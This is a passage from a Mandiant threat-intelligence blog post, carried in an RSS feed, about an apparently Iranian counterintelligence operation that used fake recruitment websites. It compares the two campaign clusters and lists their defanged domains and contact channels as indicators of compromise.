class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig13.max-1000x1000.png" alt="“VIP Human Solutions” YouTube channel: hxxps://www[.]youtube[.]com/@vipjobsglobal1819"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 13: “VIP Human Solutions” YouTube channel: hxxps://www[.]youtube[.]com/@vipjobsglobal1819</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p style="text-align: left;"><span style="vertical-align: baseline;">The video has very similar content and theme as the fake recruitment websites, including the use of the unique logo of “VIP Human Solutions.”</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/iran-i-spy-fig14.max-1000x1000.png" alt="Screenshot of the “VIP Human Solutions” video"> </a> <figcaption class="article-image__caption "><p data-block-key="avzqd">Figure 14: Screenshot of the “VIP Human Solutions” video</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The video also contains the following contact details:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Email address: sendcv@vipjobsglobal[.]com. The domain vipjobsglobal[.]com was registered in March 2018.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Facebook page: hxxps://facebook[.]com/358690841262928, which started operating in December 2017 and is no longer active.</span></p> </li> </ul> <p><span style="vertical-align: baseline;">The following table compares the historic activity with the new activity described in the previous section:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">“VIP Human Solutions”</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">“Optima HR”</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Years Active</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">2017-2022</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">2022-2024</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Languages</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Farsi</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">Arabic</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Farsi</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Targeted Regions</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Iran, Syria and Hezbollah </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Iran</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Example Domains (full list in the IOCs section)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">bilal1com[.]com (Farsi)</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">jomehjob[.]com (Farsi)</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">dreamy-job[.]com (Farsi)</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">damavand-hr[.]me (Arabic)</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">wazayif-halima[.]org (Arabic)</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">optima-hr[.]com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">joinoptimahr[.]com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">opthrltd[.]me</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">beparas[.]com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">darakeh[.]me</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">topwor4u[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">Contact Details</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/DreamyJobs_com</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/wazayif_IL</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/joinchat/<br/>AAAAAFgDeSXaWr2r_AQImw</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">+972 (Israel) phone numbers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps//t[.]me/PhantomIL13</span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/getDmIL </span></p> <p style="text-align: center;"><span style="vertical-align: baseline;">hxxps://t[.]me/joinchat/<br/>AAAAAFgDeSXaWr2r_AQImw</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2 style="text-align: left;"><span style="vertical-align: baseline;">Outlook and Implications</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">Mandiant estimates this activity supports Iranian counterintelligence efforts to identify individuals affiliated (or interested in working) with intelligence and security agencies.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">Specifically, the activities described in this blog post are of concern to Iranian individuals who are suspected to be collaborating with countries Iran might perceive as adversaries. These may include Iranian dissidents, activists, human rights advocates, and Farsi speakers living in and outside Iran.</span></p> <p style="text-align: left;"><span style="vertical-align: baseline;">The campaign casts a wide net by operating across multiple social media platforms to disseminate its network of fake HR websites in an attempt to expose Farsi-speaking individuals who may be working with intelligence and security agencies and are thus perceived as a threat to Iran’s regime. The collected data, such as addresses, contact details, as well as professional and academic experience, might be leveraged in future operations against the targeted individuals.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Additional Protection Information for Google Cloud Customers</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">For Google Chronicle Enterprise+ customers, Chronicle rules have been released to the </span><a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><span style="text-decoration: underline; vertical-align: baseline;">Emerging Threats</span></a><span style="vertical-align: baseline;"> rule pack, and IOCs listed in this blog post are available for prioritization with </span><a href="https://cloud.google.com/chronicle/docs/detection"><span style="text-decoration: underline; vertical-align: baseline;">Applied Threat Intelligence</span></a><span style="vertical-align: baseline;">.</span></p> <h2 style="text-align: left;"><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h2> <p style="text-align: left;"><span style="vertical-align: baseline;">A <a href="https://www.virustotal.com/gui/collection/a69216a9f3c5422892aeacb87da52953c9e114690b293d57011a0caf4e1be1c0" rel="noopener" target="_blank">Google Threat Intelligence Collection</a> featuring IOCs related to the activity described in this post is now available for registered users.<br/><br/></span></p> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/><col/></colgroup> <tbody> <tr> <td colspan="4" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Cluster 1: “Optima HR”, “Kandovan HR” and “Paras IL”, active 2022-2024</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">beparas[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">parasil[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">darakeh[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">kandovani[.]org</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">topwor4u[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">opthrltd[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">joinoptimahr[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">optimax-hr[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">optimac-hr[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">optima-hr[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">titanium-hr[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> </td> </tr> <tr> <td colspan="4" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Cluster 2: “VIP Human Solutions”, active 2017-2023</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">azadijobs[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">bilal1com[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">damavand-hr[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">damkahill[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">dream-jobs[.]org</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">dream-jobs[.]vip</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">dreamy-job[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">dreamy-jobs[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">dreamycareer[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">golanjobs[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">hat-cast[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">irnjobs[.]me</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">jomehjob[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">radabala[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">rostam-hr[.]vip</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">salamjobs[.]me</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">shirazicom[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">syrtime[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">topiranjobs[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">trnjobs[.]me</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">vipjobsglobal[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">wazayif-halima[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">wazayif-halima[.]org</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">wehatcast[.]com</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">youna101[.]me</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><span style="vertical-align: baseline;">younamesh[.]com</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Wed, 28 Aug 2024 14:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/</guid><category>Threat Intelligence</category><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>I Spy With My Little Eye: Uncovering an Iranian Counterintelligence Operation</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/uncovering-iranian-counterintelligence-operation/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item></channel></rss>